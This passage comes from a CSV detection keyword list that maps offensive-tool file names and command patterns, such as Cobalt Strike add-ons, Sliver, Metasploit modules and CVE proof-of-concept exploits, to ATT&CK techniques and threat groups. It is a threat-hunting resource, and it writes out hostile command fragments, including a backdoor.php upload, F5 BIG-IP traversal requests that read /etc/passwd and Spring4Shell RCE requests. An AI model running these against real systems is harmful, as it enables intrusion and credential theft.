for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*CT_Indirect_Syscalls.c*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.exe*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.sln*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.vcxproj*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*ctfr.py*,offensive_tool_keyword,ctfr,Abusing Certificate Transparency logs for getting HTTPS websites subdomains.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0010,N/A,N/A,Information Gathering,https://github.com/UnaPibaGeek/ctfr,1,0,N/A,N/A,10,1792,281,2022-05-03T12:59:37Z,2018-03-06T01:14:28Z -*ctftool*,offensive_tool_keyword,ctftool,This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. 
debugging complex issues with Text Input Processors and analyzing Windows security.,T1547.001 - T1059 - T1057,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/taviso/ctftool,1,0,N/A,N/A,10,1626,278,2021-09-17T21:02:25Z,2019-06-07T03:39:10Z -*cube0x0/LdapSignCheck*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*cube0x0/MiniDump*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential 
Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*cuddlephish*stealer.js,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*cuddlephish-main*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*curi0usJack*,offensive_tool_keyword,Github Username,github user hosting malicious code and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/curi0usJack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*curl * --upload-file backdoor.php -v*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*curl --connect-timeout 3.14 -s ifconfig.me*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,0,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*curl http*/handling-form-submission-complete/rce.jsp*,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - 
TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,0,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*curl https://api.hunter.io/v2/domain-search?domain=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl https://api.hunter.io/v2/email-finder?domain=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl https://api.hunter.io/v2/email-verifier?email=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl --output *http*/tomcatwar.jsp?*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,0,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*curl -sk 'https://*/tmui/login.jsp/.. 
/tmui/util/getTabSet.jsp?tabId=Vulnerable*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*curl*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*curl*/tmp/exploit-dirty-pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*curlshell.py*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*cursed chrome,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*cursed cookies,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*custom_payload_generator.*,offensive_tool_keyword,cobaltstrike,Various Aggressor Scripts I've Created.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/offsecginger/AggressorScripts,1,1,N/A,10,10,141,31,2022-01-01T19:04:27Z,2018-11-30T03:14:45Z -*CustomKeyboardLayoutPersistence*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*cut -d: -f1 /etc/passwd*,greyware_tool_keyword,cut,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*CVE-*.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.c*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.com*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.cpp*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - 
TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.git*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.py*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - 
T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE*/exploit.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z 
-*CVE_*_exploited.txt*,offensive_tool_keyword,POC,A Safer PoC for CVE-2022-22965 (Spring4Shell),T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/colincowie/Safer_PoC_CVE-2022-22965,1,1,N/A,N/A,1,45,7,2022-05-27T12:56:40Z,2022-03-31T16:58:56Z -*cve_2_MSF_exploit_Mapping*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*CVE_20*.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*cve_2019_0708_bluekeep_fail*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve_2019_0708_bluekeep_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve_2020_0796_smbghost.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve-20.x64.dll*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*cve-20.x86.dll*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
